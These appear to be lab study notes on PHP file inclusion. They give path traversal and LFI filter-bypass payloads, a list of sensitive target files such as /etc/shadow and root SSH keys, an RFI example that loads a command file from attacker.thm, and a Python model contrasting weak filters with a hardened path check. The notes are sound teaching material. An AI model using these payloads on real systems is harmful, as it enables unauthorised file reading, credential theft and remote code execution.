File Inclusion

Introduction

  • Web applications request access to files on a given system, such as images and static text, via request parameters.
  • File inclusion vulnerabilities happen when these inputs are not properly sanitized.
  • For example: http://webapp.thm/get.php?file=userCV.pdf

Path Traversal

  • Also known as directory traversal, this web security vulnerability allows an attacker to read operating system resources, such as local files on the server running the application.
  • The user input is passed to functions such as file_get_contents in PHP.
  • When the user input is not properly validated, the attacker can pass a payload like the one below to access resources outside the website root.
    http://webapp.thm/get.php?file=../../../../etc/passwd
  • Depending on the OS and its version, the attacker can also request one of the following:
    http://webapp.thm/get.php?file=../../../../boot.ini
    http://webapp.thm/get.php?file=../../../../windows/win.ini
  • Below are some common OS files you could use when testing.
    • /etc/issue - Contains a message or system identification to be printed before the login prompt.
    • /etc/profile - Controls system-wide default variables.
    • /proc/version - Specifies the version of the Linux kernel.
    • /etc/passwd - Has all registered users that have access to a system.
    • /etc/shadow - Contains information about the system's users' passwords.
    • /root/.bash_history - Contains the history commands for root user.
    • /var/log/dmesg - Contains global system messages.
    • /var/mail/root - All emails for root user.
    • /root/.ssh/id_rsa - Private SSH keys for a root or any known valid user on the server.
    • /var/log/apache2/access.log - The accessed requests for Apache web server.
    • C:\boot.ini - Contains the boot options for computers with BIOS firmware.

Local File Inclusion (LFI)

  • The functions include, require, include_once, and require_once often contribute to LFI in PHP.
  • LFI can also occur in other languages such as ASP, JSP and even Node.js.
  • For example, a language file is fetched with http://webapp.thm/index.php?lang=EN.php using the include function.

Simple LFI

  • Language is fetched with the include function.
    <?php
    include($_GET["lang"]);
    ?>
  • Exploit: http://webapp.thm/get.php?lang=/etc/passwd

LFI with Folder

  • Language is fetched from a file inside a specific folder.
    <?php
    include("languages/". $_GET['lang']);
    ?>
  • Exploit: http://webapp.thm/index.php?lang=../../../../etc/passwd.

LFI with Folder and File Extension

  • Language is fetched from a file with extension.
  • For example: If we pass lang=EN it would be converted to EN.php.
  • Exploit: Add a null byte (%00) at the end to truncate the appended extension: http://webapp.thm/index.php?lang=../../../..//etc/passwd%00.
  • Note: Enter the payload directly into the address bar rather than the form, which might encode the payload.
  • Note: The null byte (%00) trick was fixed in PHP 5.3.4 and does not work on that version or later.

LFI with Keyword filter

  • Files with sensitive information such as /etc/passwd are filtered.
  • Exploit:
    • Null byte trick http://webapp.thm/index.php?lang=../../../../etc/passwd%00.
    • Current directory trick http://webapp.thm/index.php?lang=../../../../etc/passwd/..

LFI with Path Traversal Filter

  • The path traversal sequence ../ is replaced with an empty string.
  • Exploit: Double up the sequence so that a single-pass replacement leaves ../ behind: http://webapp.thm/index.php?lang=....//....//....//....//etc//passwd.

LFI with Defined Directory

  • The path is forced to include a specific directory.
  • Exploit: Add the folder at the start of the path: http://webapp.thm/index.php?lang=languages/../../../../etc/passwd
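As an added example (not part of these notes), the following Python models the three weak filters described above and the bypass each payload relies on, then shows a hardened resolver that canonicalises the path and checks it still lies inside the languages directory. WEBROOT, the directory layout and the filter logic are assumptions constructed for the example.

```python
import os

# Constructed layout for the example; the real application's paths are unknown.
WEBROOT = "/var/www/html"
LANG_DIR = os.path.realpath(os.path.join(WEBROOT, "languages"))

def weak_include_path(lang, strip_traversal=False, force_dir=False,
                      add_ext=False, null_truncates=False):
    """Path a weak handler in the style of include("languages/" . $_GET['lang'])
    would open. Each flag models one filter from the notes (reconstructed here)."""
    if strip_traversal:
        lang = lang.replace("../", "")      # single pass: "....//" collapses to "../"
    if force_dir:
        if not lang.startswith("languages/"):
            return None                     # the path must name the directory
        rel = lang
    else:
        rel = "languages/" + lang
    if add_ext:
        rel += ".php"
    if null_truncates:                      # C-level truncation, PHP before 5.3.4
        rel = rel.split("\x00", 1)[0]
    return os.path.normpath(os.path.join(WEBROOT, rel))

def safe_include_path(lang):
    """Hardened resolution: reject NUL, canonicalise, then require the result to
    still sit under LANG_DIR. Nothing is stripped, so there is nothing to bypass."""
    if "\x00" in lang:
        return None
    candidate = os.path.realpath(os.path.join(LANG_DIR, lang + ".php"))
    if os.path.commonpath([candidate, LANG_DIR]) != LANG_DIR:
        return None
    return candidate

# The notes' payloads, URL-decoded as the server sees them (%00 is a NUL byte).
PAYLOADS = {
    "strip": "....//....//....//....//etc//passwd",
    "force_dir": "languages/../../../../etc/passwd",
    "null_byte": "../../../..//etc/passwd\x00",
}

def demo():
    """Resolved path per filter; /etc/passwd means the filter was bypassed."""
    return {
        "strip": weak_include_path(PAYLOADS["strip"], strip_traversal=True),
        "force_dir": weak_include_path(PAYLOADS["force_dir"], force_dir=True),
        "null_byte": weak_include_path(PAYLOADS["null_byte"], add_ext=True,
                                       null_truncates=True),
        "safe": {k: safe_include_path(v) for k, v in PAYLOADS.items()},
    }
```

Against the hardened resolver the doubled-up payload stays a harmless literal name under the languages directory, and the other two are rejected outright; where the set of languages is known, an allowlist of codes on top of this check is stricter still.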

Remote File Inclusion (RFI)

  • Remote File Inclusion (RFI) is a technique to include remote files in a vulnerable application.
  • One requirement for RFI is that the allow_url_fopen option needs to be on.
  • The risk of RFI is higher than that of LFI, as RFI lets an attacker achieve Remote Command Execution (RCE).
  • A successful RFI attack requires the application server to communicate with an external server on which the attacker hosts malicious files.
  • The malicious file is then injected into the include function via an HTTP request, and its content executes on the vulnerable application server.
  • Example: http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt.

Steps for testing for LFI

  • Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
  • Enter a valid input to see how the web server behaves.
  • Enter invalid inputs, including special characters and common file names.
  • Don't assume that what you type into an input form is what the server receives; use the browser address bar or a tool such as Burp Suite.
  • Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
  • Understand the input validation and if there are any filters!
  • Try injecting a valid entry to read sensitive files.